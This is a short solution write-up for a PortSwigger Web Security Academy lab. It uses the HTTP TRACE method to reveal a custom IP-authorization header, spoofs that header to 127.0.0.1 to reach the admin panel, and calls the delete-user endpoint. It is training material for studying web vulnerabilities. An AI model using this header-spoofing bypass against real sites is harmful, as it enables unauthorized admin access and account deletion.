Authentication bypass via information disclosure

https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass

Description

This lab's administration interface has an authentication bypass vulnerability, but it is impractical to exploit without knowledge of a custom HTTP header used by the front-end.

To solve the lab, obtain the header name then use it to bypass the lab's authentication. Access the admin interface and delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

Solution

Starting access to wiener user https://0ae80062039d9b5194f2429800130047.web-security-academy.net/login

Checking page sources there're not of interesting, so we can try access to admin page adding /admin path to our URL: https://0a160012030fde108045dab900300013.web-security-academy.net/admin

and we can see this information disclosure message: "Admin interface only available to local users"

so, we start to analyze request for understanding more things

We can try to change request method to see if the answer changes.

It will happen via TRACE method with the response status code 200.

Trace is a debug method and it display us an important information as: X-Custom-IP-Authorization: 37.101.171.137

We can copy it inserting a localhost IP: 127.0.0.1 in our request and change again method to GET

Now we're into admin panel having the permission to delete 'carlos' user

analyzing the reponse, there's a URL that permits to delete 'carlos' account: GET /admin/delete?username=carlos

Copy and add it into our request to delete account and solve the lab.